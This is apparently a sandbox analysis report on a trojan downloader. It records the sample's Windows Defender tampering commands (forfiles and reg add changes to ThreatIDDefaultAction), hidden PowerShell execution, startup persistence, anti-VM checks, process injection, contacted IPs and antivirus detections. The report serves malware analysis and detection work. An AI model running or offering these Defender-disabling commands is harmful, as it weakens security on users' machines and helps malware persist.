cmdline	"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
cmdline	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
cmdline	forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
cmdline	forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
cmdline	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
cmdline	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
cmdline	/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
cmdline	/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

Communicates with host for which no DNS query was performed (2 events)

host	194.58.114.223
host	91.121.59.207

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Aug. 17, 2024, 10:12 p.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

Checks the version of Bios, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion

Checks the CPU name from registry, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Installs itself for autorun at Windows startup (4 events)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AOgSI6AiHrwEcKm36yPe6WQ7.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4Ros4JuAPsw2Ks71Cb0ofjym.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFmeQ7Y2qNuXg7CJhoe0Mf5q.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CTmGnZQw0rXprS4H71WQdxSN.bat

Collects information about installed applications (50 out of 53 events)

Time & API	Arguments	Status
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 19.00 (x64) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HashTab 6.0.0.34 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\HashTab\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Firefox (x64 en-US) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.1 (x64 en-US)\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Maintenance Service regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft .NET Framework 4.5 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1AD147D0-BE0E-3D6C-AC11-64F6DC4163F1}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft .NET Framework 4.5 KOR Language Pack regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3160A0D4-A4F3-39B4-B4CC-B5306F9CF9B3}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 x64 Minimum Runtime - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{50A2BC33-C9CD-3BF1-A8FF-53C10A0B183C}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office 64-bit Components 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002A-0000-1000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared 64-bit MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002A-0409-1000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0116-0409-1000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft .NET Framework 4.5 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft .NET Framework 4.5 한국어 언어 팩 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1042\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Python 2.7.18 (64-bit) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A5F504DF-2ED9-4A2D-A2F3-9D2750DD42D6}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 x64 Additional Runtime - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{EF1EC6A9-17DE-3DA9-B040-686A1E8A8B04}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Excel MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft PowerPoint MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Publisher MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Outlook MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Word MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - English regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Outils de vérification linguistique 2013 de Microsoft Office - Français regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - Español regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft InfoPath MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft DCF MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft OneNote MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Groove MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM UX MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Lync MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 17, 2024, 10:12 p.m.	key_handle: 0x000000fc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Powershell script adds registry entries (1 event)

cmd

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" powershell start-process -windowstyle hidden gpupdate.exe /force"c:\users\test22\pictures\acfyonjqgqhfmgmkng1gznmy.exe" "c:\windows\system32\control.exe" "c:\users\test22\appdata\local\temp\rarsfx0\keygen-step-2.cpl", "c:\users\test22\appdata\local\temp\rarsfx0\keygen.bat" cmd /c forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" forfiles /p c:\windows\system32 /m help.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"reg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147780199 /t reg_sz /d 6c:\users\test22\pictures\vgdyfc1vcbsqmc2ssnuc62y1.exe/c reg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147735503 /t reg_sz /d 6.\install.exe/c reg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147812831 /t reg_sz /d 6"c:\windows\system32\cmd.exe" /c forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"reg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147814524 /t reg_sz /d 6.\install.exe /wgdidjad "385104" /sc:\windows\system32\gpupdate.exe /force c:\users\test22\pictures\by1wxv8eleobwnctpr7kl9vv.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" "c:\users\test22\pictures\z7sqttpo7jhmcmdp0blbc6qe.exe" "c:\windows\system32\rundll32.exe" shell32.dll,control_rundll "c:\users\test22\appdata\local\temp\rarsfx0\keygen-step-2.cpl",forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" c:\users\test22\appdata\local\temp\rarsfx0\keygen-step-2.cpl /c powershell start-process -windowstyle hidden gpupdate.exe /forcereg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147812831 /t reg_sz /d 6"c:\users\test22\pictures\vgdyfc1vcbsqmc2ssnuc62y1.exe" reg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147735503 /t reg_sz /d 6%systemroot%\system32\rundll32.exe shell32.dll,control_rundll "c:\users\test22\appdata\local\temp\rarsfx0\keygen-step-2.cpl","c:\windows\system32\gpupdate.exe" /force /c reg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147780199 /t reg_sz /d 6/c reg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147814524 /t reg_sz /d 6c:\users\test22\appdata\local\temp\rarsfx0\keygen.bat"c:\windows\syswow64\rundll32.exe" "c:\windows\syswow64\shell32.dll",#44 "c:\users\test22\appdata\local\temp\rarsfx0\keygen-step-2.cpl",c:\users\test22\pictures\z7sqttpo7jhmcmdp0blbc6qe.exe"c:\users\test22\pictures\by1wxv8eleobwnctpr7kl9vv.exe" c:\users\test22\pictures\acfyonjqgqhfmgmkng1gznmy.exe

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	C:\Windows\System32\gpupdate.exe /force
parent_process	powershell.exe				martian_process	"C:\Windows\system32\gpupdate.exe" /force

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2924 resumed a thread in remote process 3000
Process injection	Process 3024 resumed a thread in remote process 3056
NtResumeThread Aug. 17, 2024, 10:12 p.m.	thread_handle: 0x00000318 suspend_count: 1 process_identifier: 3000	1	0	0
NtResumeThread Aug. 17, 2024, 10:12 p.m.	thread_handle: 0x0000000000000284 suspend_count: 1 process_identifier: 3056	1	0	0

Creates a suspicious Powershell process (5 events)

option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

Detects VirtualBox using WNetGetProviderName trick (1 event)

Time & API	Arguments	Status	Return	Repeated
WNetGetProviderNameW Aug. 17, 2024, 10:12 p.m.	net_type: 0x00250000		1222	0

Disables Windows Security features (4 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\2147735503
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\2147814524
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\2147812831
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\2147780199

File has been identified by 56 AntiVirus engines on VirusTotal as malicious (50 out of 56 events)

Bkav	W32.AIDetectMalware.CS
Lionic	Trojan.Win32.Tiny.a!c
Elastic	malicious (high confidence)
Skyhigh	Artemis!Trojan
ALYac	IL:Trojan.MSILZilla.29975
Cylance	Unsafe
VIPRE	IL:Trojan.MSILZilla.29975
Sangfor	Downloader.Msil.Tiny.Vclt
K7AntiVirus	Trojan-Downloader ( 005abba61 )
BitDefender	IL:Trojan.MSILZilla.29975
K7GW	Trojan-Downloader ( 005abba61 )
Cybereason	malicious.4b2549
Arcabit	IL:Trojan.MSILZilla.D7517
VirIT	Trojan.Win32.MSIL_Heur.A
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of MSIL/TrojanDownloader.Tiny.CIQ
APEX	Malicious
McAfee	Artemis!A107FBD4B254
Avast	Win32:DropperX-gen [Drp]
Kaspersky	HEUR:Trojan-Downloader.MSIL.Upatre.gen
Alibaba	TrojanDownloader:MSIL/Upatre.ecc36d74
MicroWorld-eScan	IL:Trojan.MSILZilla.29975
Rising	Trojan.IPLogger!1.B69D (CLASSIC)
Emsisoft	IL:Trojan.MSILZilla.29975 (B)
F-Secure	Heuristic.HEUR/AGEN.1371472
DrWeb	Trojan.DownLoaderNET.786
TrendMicro	Trojan.Win32.OPERALOADER.YXEHQZ
McAfeeD	Real Protect-LS!A107FBD4B254
